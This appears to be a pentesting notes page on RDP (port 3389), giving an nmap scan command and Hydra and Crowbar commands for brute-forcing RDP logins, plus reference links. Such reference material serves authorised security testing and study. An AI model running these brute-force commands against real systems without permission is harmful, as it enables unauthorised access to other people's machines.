3389 - RDP

Theory

The remote desktop protocol is the common application used to connect remotely to Windows operating systems. If enabled on the remote host, users can connect to the graphical user interface of the Windows host. Take note that the RDP server will listen on port 3389 to get the job done.

Practical

Nmap Scan

nmap ‐sV ‐sC ‐O ‐T5 ‐p 3389 <IP>

Brute Force

Hydra

hydra -L <user list> -P <password list> rdp://<IP>

hydra -l "Administrator" -P ~/Desktop/users.txt rdp://<IP>

Crowbar

# Install Crowbar
sudo apt install crowbar

# Brute force
crowbar ‐b rdp ‐s 172.16.0.104/32 ‐u admin ‐C /root/pass.txt

REFERENCES

https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp
https://www.hackingarticles.in/remote-desktop-penetration-testing-port-3389/
https://exploit-notes.hdks.org/exploit/windows/protocol/rdp-pentesting/
https://hacktricks.boitatech.com.br/pentesting/pentesting-rdp

Previous80, 443 - HTTP, HTTPS Next5900 - VNC

Last updated 5 months ago